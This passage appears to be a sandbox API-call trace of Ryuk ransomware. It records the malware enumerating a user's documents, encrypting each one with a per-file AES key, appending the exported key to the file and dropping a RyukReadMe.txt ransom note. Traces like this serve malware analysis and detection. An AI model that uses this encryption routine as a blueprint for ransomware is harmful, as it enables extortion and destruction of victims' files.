| out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.069] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0154.069] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0154.069] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.069] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf5cb, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xf5cb, lpOverlapped=0x0) returned 1 [0154.070] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0154.070] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xf5cb, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xf5d0) returned 1 [0154.071] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.071] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf5d0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xf5d0, lpOverlapped=0x0) returned 1 [0154.071] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0154.071] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0154.071] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0154.071] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0154.071] CloseHandle (hObject=0x198) returned 1 [0154.086] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.090] CryptDestroyKey (hKey=0x3b8690) returned 1 [0154.090] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.090] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0154.090] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0154.091] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\Hk9IHBadcxpo.docx", dwFileAttributes=0x80) returned 1 [0154.091] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\Hk9IHBadcxpo.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\ygba ikzbi0yvm\\hk9ihbadcxpo.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0154.091] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=43359) returned 1 [0154.091] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=43359) returned 1 [0154.091] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xa83d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.091] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0154.092] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.092] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0154.092] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0154.092] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.092] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0xa95f, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xa95f, lpOverlapped=0x0) returned 1 [0154.093] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0154.093] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xa95f, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xa960) returned 1 [0154.093] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.093] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xa960, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xa960, lpOverlapped=0x0) returned 1 [0154.093] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0154.093] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0154.093] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0154.093] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0154.093] CloseHandle (hObject=0x198) returned 1 [0154.595] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.599] CryptDestroyKey (hKey=0x3b8690) returned 1 [0154.599] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.600] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0154.600] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0154.600] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\IltOaz4cbaTa6ci041.ots", dwFileAttributes=0x80) returned 1 [0154.600] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\IltOaz4cbaTa6ci041.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\ygba ikzbi0yvm\\iltoaz4cbata6ci041.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0154.600] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1840) returned 1 [0154.600] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1840) returned 1 [0154.600] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x60e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.600] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0154.601] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.601] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0154.601] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0154.601] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.601] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x730, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x730, lpOverlapped=0x0) returned 1 [0154.601] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0154.601] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x730, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x740) returned 1 [0154.601] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.602] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x740, lpOverlapped=0x0) returned 1 [0154.602] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0154.602] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0154.602] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0154.602] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0154.602] CloseHandle (hObject=0x198) returned 1 [0154.618] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.622] CryptDestroyKey (hKey=0x3b8690) returned 1 [0154.622] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.622] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0154.622] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0154.622] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\kSRpUHEV.pptx", dwFileAttributes=0x80) returned 1 [0154.623] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\kSRpUHEV.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\ygba ikzbi0yvm\\ksrpuhev.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0154.623] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=67965) returned 1 [0154.623] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=67965) returned 1 [0154.623] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x1085b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.623] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0154.624] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.624] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0154.624] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0154.624] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.624] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1097d, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1097d, lpOverlapped=0x0) returned 1 [0154.625] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0154.625] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1097d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x10980) returned 1 [0154.625] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.625] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10980, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x10980, lpOverlapped=0x0) returned 1 [0154.626] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0154.626] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0154.626] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0154.626] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0154.626] CloseHandle (hObject=0x198) returned 1 [0154.663] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.667] CryptDestroyKey (hKey=0x3b8690) returned 1 [0154.667] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.668] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0154.668] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0154.668] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\O4rQm.doc", dwFileAttributes=0x80) returned 1 [0154.668] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\O4rQm.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\ygba ikzbi0yvm\\o4rqm.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0154.668] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1110) returned 1 [0154.668] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1110) returned 1 [0154.668] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x334, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.668] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0154.669] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.669] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0154.669] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0154.669] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.669] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x456, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x456, lpOverlapped=0x0) returned 1 [0154.669] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0154.669] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x456, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x460) returned 1 [0154.669] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.669] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x460, lpOverlapped=0x0) returned 1 [0154.670] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0154.670] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0154.670] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0154.670] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0154.670] CloseHandle (hObject=0x198) returned 1 [0154.686] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.724] CryptDestroyKey (hKey=0x3b8690) returned 1 [0154.724] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0154.724] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0154.724] SetLastError (dwErrCode=0x0) [0154.724] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\ygba ikzbi0yvm\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0154.725] GetLastError () returned 0x0 [0154.725] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0154.725] CloseHandle (hObject=0x198) returned 1 [0154.725] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\oJ4D06 VFJ\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0154.726] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0154.726] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0154.726] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0154.726] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\oJ4D06 VFJ\\k W0oH.ots", dwFileAttributes=0x80) returned 1 [0154.727] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-PjmXzfFQ-addFOR\\NJmxImp-KWRPjHP3K\\hRAVzQb\\yGbA IkZbi0YVm\\oJ4D06 VFJ\\k W0oH.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\-pjmxzffq-addfor\\njmximp-kwrpjhp3k\\hravzqb\\ygba ikzbi0yvm\\oj4d06 vfj\\k w0oh.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0154.727] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=23593) returned 1 [0154.727] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=23593) returned 1 [0154.727] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x5b07, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0154.727] ReadFile (in: hFile=0x19c, lpBuffer=0x29aa9d8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa998, lpOverlapped=0x0 | out: lpBuffer=0x29aa9d8*, lpNumberOfBytesRead=0x29aa998*=0x19, lpOverlapped=0x0) returned 1 [0154.727] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.727] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa960 | out: phKey=0x29aa960*=0x3b8690) returned 1 [0154.728] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0154.728] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.728] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x5c29, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0x5c29, lpOverlapped=0x0) returned 1 [0154.728] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4250) returned 1 [0154.728] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0x5c29, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0x5c30) returned 1 [0154.728] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, 